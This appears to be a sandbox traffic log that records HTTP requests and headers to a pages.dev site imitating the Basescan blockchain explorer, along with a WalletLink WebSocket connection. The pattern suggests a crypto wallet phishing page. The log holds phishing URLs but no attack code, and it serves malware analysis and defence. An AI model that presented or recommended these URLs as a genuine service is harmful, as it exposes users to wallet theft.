            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/dist/style.css HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/website.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/dist/840013fd8c2ab234.css HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/website.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/dist/styles.css HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/website.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/z0emk-akw98-t47wk.js HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/config.js HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/modules.js HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/dist/dist/website.html HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/website.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/dist/modules.js HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/website.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/dist/config.js HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/website.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/dist/z0emk-akw98-t47wk.js HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/website.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/dist/loaderImage.gif HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/website.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/dist/dist/style.css HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/website.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/dist/dist/840013fd8c2ab234.css HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/website.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/dist/dist/styles.css HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/website.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/dist/dist/config.js HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/website.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/dist/modules.js HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/dist/z0emk-akw98-t47wk.js HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/dist/config.js HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/dist/dist/config.js HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/dist/dist/dist/website.html HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/website.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/dist/dist/modules.js HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/website.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/dist/dist/z0emk-akw98-t47wk.js HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/website.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/dist/dist/loaderImage.gif HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/website.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /rpc HTTP/1.1Host: www.walletlink.orgConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: k65NKtNQOinrrQuk5vW8Cg==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/dist/dist/dist/style.css HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/website.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/dist/dist/dist/840013fd8c2ab234.css HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/website.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/dist/dist/dist/styles.css HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/website.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/dist/dist/dist/loaderImage.gif HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/website.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/dist/dist/dist/config.js HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/website.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/dist/dist/modules.js HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/dist/dist/z0emk-akw98-t47wk.js HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/dist/dist/dist/loaderImage.gif HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/dist/dist/dist/config.js HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
